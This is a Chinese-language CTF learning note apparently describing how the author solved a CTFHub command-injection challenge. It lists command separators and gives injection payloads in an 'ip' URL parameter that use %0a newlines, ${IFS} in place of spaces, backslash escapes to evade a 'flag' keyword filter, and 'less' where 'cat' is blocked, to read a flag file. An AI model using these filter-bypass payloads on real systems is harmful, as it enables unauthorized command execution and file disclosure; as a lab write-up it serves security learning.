CTFHub 命令注入-综合练习(学习记录)

综合过滤练习

命令分隔符的绕过姿势

;

%0a

%0d

&

那我们使用%0a试试,发现ls命令被成功执行

复制代码
/?ip=127.0.0.1%0als

发现一个名为flag_is_here的文件夹和index.php的文件,那么我们还是使用cd命令进入到文件夹下

http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1 cd flag_is_here%0als

发现空格和flag被过滤,空格绕过前面已经讲述,这里就不在赘述,直接尝试${IFS}进行空格绕过,使用fla\g反斜杠转义flag

复制代码
/?ip=127.0.0.1%0als${IFS}f\lag_is_here

成功读取flag_is_here文件夹下的内容

接下来,直接使用cat读取flag_300121897522180.php文件里的内容

发现过滤了cat,前面也讲过cat的绕过姿势,这里不在赘述,直接尝试less

复制代码
/?ip=127.0.0.1%0Acd${IFS}f\lag_is_here%0Aless${IFS}f\lag_3879302014865.php

命令执行成功,查看页面源代码得到flag

相关推荐
天水幼麟29 分钟前
动手学深度学习-学习笔记【二】(基础知识)
笔记·深度学习·学习
沧海一笑-dj1 小时前
【51单片机】51单片机学习笔记-课程简介
笔记·学习·51单片机·江科大·江科大学习笔记·江科大单片机·江科大51单片机
老虎06271 小时前
JavaWeb(苍穹外卖)--学习笔记04(前端:HTML,CSS,JavaScript)
前端·javascript·css·笔记·学习·html
大苏打seven2 小时前
Docker学习笔记:Docker网络
笔记·学习·docker
Green1Leaves4 小时前
pytorch学习-9.多分类问题
人工智能·pytorch·学习
慕y2744 小时前
Java学习第十五部分——MyBatis
java·学习·mybatis
碣石潇湘无限路5 小时前
【AI篇】当Transformer模型开始学习《孙子兵法》
人工智能·学习
future14126 小时前
C#每日学习日记
java·学习·c#
碎叶城李白8 小时前
若依学习笔记1-validated
java·笔记·学习·validated
im_AMBER9 小时前
学习日志05 python
python·学习